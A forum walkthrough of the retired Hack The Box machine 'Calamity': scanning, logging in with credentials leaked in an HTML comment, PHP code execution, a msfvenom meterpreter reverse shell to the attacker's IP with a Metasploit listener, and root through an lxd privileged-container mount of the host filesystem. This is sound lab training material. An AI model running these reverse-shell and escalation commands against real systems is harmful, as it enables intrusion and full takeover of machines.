Hack the Box – Calamity Walkthrough

ctf
hackthebox
writeups
walkthrough
#1

Today we’re going to solve another CTF machine “ Calamity ”. It is now retired box and can be accessible if you’re a VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.27
  • Difficulty: Insane

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -sS -sU -T4 -A -v 10.10.10.27

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
|   256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
|_  256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Brotherhood Software

Enumeration

Dirbuster

Dirbuster revels admin.php and uploads directory. Let’s take a look.

admin

Password: <input type="text" name="user"><br>
Username: <input type="password" name="pass">
<!-- password is:skoupidotenekes-->

If you look closely Password input field is for Username and Username field is for Password.

Password: admin
Username: skoupidotenekes

After successfully login we see this.

We can easily execute php code.

<?php print exec(id) ?>

Let’s create a reverse shell using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -e php/base64 -f raw

Reverse Shell

<?php REVERSE_SHELL ?>

Setup the listener

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Now, we have reverse shell and user flag.

Escape restricted shell using

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

Let’s search for uncommon things first manually.

[email protected]:/home/xalvas$ ls -la
ls -la
total 3180
drwxr-xr-x 7 xalvas xalvas    4096 Jun 29  2017 .
drwxr-xr-x 3 root   root      4096 Jun 27  2017 ..
-rw-r--r-- 1 xalvas xalvas     220 Jun 27  2017 .bash_logout
-rw-r--r-- 1 xalvas xalvas    3790 Jun 27  2017 .bashrc
drwx------ 2 xalvas xalvas    4096 Jun 27  2017 .cache
-rw-rw-r-- 1 xalvas xalvas      43 Jun 27  2017 .gdbinit
drwxrwxr-x 2 xalvas xalvas    4096 Jun 27  2017 .nano
-rw-r--r-- 1 xalvas xalvas     655 Jun 27  2017 .profile
-rw-r--r-- 1 xalvas xalvas       0 Jun 27  2017 .sudo_as_admin_successful
drwxr-xr-x 2 xalvas xalvas    4096 Jun 27  2017 alarmclocks
drwxr-x--- 2 root   xalvas    4096 Jun 29  2017 app
-rw-r--r-- 1 root   root       225 Jun 27  2017 dontforget.txt
-rw-r--r-- 1 root   root      1322 Dec 24  2017 intrusions
drwxrwxr-x 4 xalvas xalvas    4096 Jun 27  2017 peda
-rw-r--r-- 1 xalvas xalvas 3196724 Jun 27  2017 recov.wav
-r--r--r-- 1 root   root        33 Jun 27  2017 user.txt

There’s a wav audio file we should take a look at let’s download it.

We have downloaded these three audio files we found.

/home/xalvas/recov.wav -> recov.wav
/home/xalvas/alarmclocks/rick.wav -> rick.wav
/home/xalvas/alarmclocks/xouzouris.mp3 -> xouzouris.mp3

Let’s do some reconnaissance and perform stenography on these audio files using audacity tool.

Let’s import these audio files in audacity and listen.

The recov.wav and rick.wav sound similar and after inverting one of the track revealed password.

Your Password is: 18547936…*

It is possible that it can be SSH creds let’s try with user xalvas.

ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)

[email protected]:~$ id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

We see lxd user and there’s an exploit available for this to run processes as root.

Let’s download this exploit and upload to machine.

git clone https://github.com/saghul/lxd-alpine-builder.git

Now, let’s build

./build-alpine -a i686

Now, we have few commands to type

lxc image import alpine-v3.9-i686-20190326_1027.tar.gz --alias alpine
lxc image list
lxc init alpine ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Here’s our root flag.

/mnt/root/root # ls -la
total 44
drwx------    5 root     root          4096 Jun 30  2017 .
drwxr-xr-x   22 root     root          4096 Jun 29  2017 ..
-rw-------    1 root     root             1 Dec 24  2017 .bash_history
-rw-r--r--    1 root     root          3104 Jun 28  2017 .bashrc
drwx------    2 root     root          4096 Jun 30  2017 .cache
-rw-r--r--    1 root     root            22 Jun 27  2017 .gdbinit
drwxr-xr-x    2 root     root          4096 Jun 27  2017 .nano
-rw-r--r--    1 root     root           148 Aug 17  2015 .profile
-rw-r--r--    1 root     root             0 Jun 27  2017 .sudo_as_admin_successful
drwxr-xr-x    4 root     root          4096 Jun 27  2017 peda
-r--------    1 root     root            33 Jun 27  2017 root.txt
-rwxr-xr-x    1 root     root           897 Jun 28  2017 scr
/mnt/root/root # wc -c root.txt 
33 root.txt

This was an unintended way of getting root. There’s another method of SUID binary buffer overflow.